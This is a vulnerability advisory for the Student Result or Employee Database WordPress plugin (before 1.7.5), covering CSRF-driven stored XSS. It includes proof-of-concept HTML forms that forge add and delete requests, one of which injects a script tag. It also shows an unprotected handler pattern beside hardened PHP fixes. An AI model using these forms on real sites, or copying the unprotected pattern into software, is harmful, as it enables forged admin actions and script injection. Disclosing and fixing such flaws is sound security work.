WordPress Plugin Vulnerabilities

Student Result or Employee Database < 1.7.5 - Stored Cross Site Scripting via CSRF

Description

The plugin does not perform CSRF checks in its AJAX actions, allowing attackers to make a logged-in user with a role as low as Contributor add, edit and delete students via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping, this could also lead to Stored Cross-Site Scripting.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?action=ssr_add_st_submit" method="POST">
      <input type="hidden" name="rid" value='<script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?action=ssr_del_st_submit" method="POST">
      <input type="hidden" name="postID" value="<RID>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
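The two forms above work because the add and delete handlers accept any request from a logged-in browser and store the submitted value as-is. The following is an added illustration of how such handlers are normally protected in WordPress; it is not the plugin's code nor the researchers' material. The wp_ajax_ hook names (the PoC posts to admin.php, so the plugin's real routing may differ), the 'manage_options' capability, the 'ssr_student' post type and the nonce name 'ssr_nonce' are all assumptions.

```php
<?php
/**
 * Added illustration (not the plugin's own code): a hypothetical reconstruction
 * of the unprotected pattern, followed by hardened handlers for the two actions
 * named in the advisory. Hook names, capability, post type and field names are
 * assumptions.
 */

// --- Unprotected pattern (hypothetical, illustrating the flaw class) ------------
// No nonce, no capability check, no sanitisation: any request arriving with a
// logged-in cookie is honoured, and the raw value is stored and echoed.
function ssr_add_st_submit_unprotected() {
    $rid = $_POST['rid'];                        // unsanitised user input
    wp_insert_post( array(
        'post_type'   => 'ssr_student',
        'post_title'  => $rid,                   // stored as-is
        'post_status' => 'publish',
    ) );
    echo 'Added ' . $rid;                        // echoed without escaping
    wp_die();
}

// --- Hardened handlers (assumed hook names) -----------------------------------
add_action( 'wp_ajax_ssr_add_st_submit', 'ssr_add_st_submit_handler' );
add_action( 'wp_ajax_ssr_del_st_submit', 'ssr_del_st_submit_handler' );

function ssr_add_st_submit_handler() {
    // 1. CSRF: the request must carry a nonce minted for this action.
    //    check_ajax_referer() terminates the request when the nonce is missing or invalid.
    check_ajax_referer( 'ssr_student_action', 'ssr_nonce' );

    // 2. Authorisation: a Contributor must not be able to manage students.
    //    'manage_options' is an assumed choice; use whatever capability fits the plugin.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // 3. Validate and sanitise input before it is stored.
    $rid = isset( $_POST['rid'] ) ? sanitize_text_field( wp_unslash( $_POST['rid'] ) ) : '';
    if ( '' === $rid || ! preg_match( '/^[A-Za-z0-9_-]{1,32}$/', $rid ) ) {
        wp_send_json_error( array( 'message' => 'Invalid student id' ), 400 );
    }

    $post_id = wp_insert_post( array(
        'post_type'   => 'ssr_student',
        'post_title'  => $rid,
        'post_status' => 'publish',
    ), true );
    if ( is_wp_error( $post_id ) ) {
        wp_send_json_error( array( 'message' => $post_id->get_error_message() ), 500 );
    }

    // 4. Escape on output: anything placed into HTML goes through esc_html().
    wp_send_json_success( array(
        'id'   => $post_id,
        'html' => '<li>' . esc_html( $rid ) . '</li>',
    ) );
}

function ssr_del_st_submit_handler() {
    check_ajax_referer( 'ssr_student_action', 'ssr_nonce' );

    $post_id = isset( $_POST['postID'] ) ? absint( $_POST['postID'] ) : 0;

    // Object-level check: the caller must be allowed to delete this specific post,
    // and it must be a student record rather than an arbitrary post ID.
    if ( ! $post_id || 'ssr_student' !== get_post_type( $post_id )
        || ! current_user_can( 'delete_post', $post_id ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed' ), 403 );
    }

    wp_delete_post( $post_id, true );
    wp_send_json_success( array( 'deleted' => $post_id ) );
}

// The admin form must emit the nonce the handlers verify; for fetch()/jQuery.ajax()
// callers the same value can be handed to JavaScript via wp_localize_script().
function ssr_render_add_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>">
        <input type="hidden" name="action" value="ssr_add_st_submit" />
        <?php wp_nonce_field( 'ssr_student_action', 'ssr_nonce' ); ?>
        <input type="text" name="rid" pattern="[A-Za-z0-9_-]{1,32}" required />
        <?php submit_button( 'Add student' ); ?>
    </form>
    <?php
}
```

With the nonce in place, a cross-site form like the PoC cannot supply a valid ssr_nonce, so check_ajax_referer() rejects it before any state changes; the capability check closes the Contributor-level access independently of CSRF, and sanitisation plus esc_html() removes the stored XSS vector even if an authorised user submits markup.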

Classification

Type
XSS
Miscellaneous

Original Researcher
Vinay Varma Mudunuri, Krishna Harsha Kondaveeti
Submitter
Vinay Varma Mudunuri
Verified
Yes

Timeline

Publicly Published
2022-08-01
Added
2022-08-01
Last Updated
2023-04-28
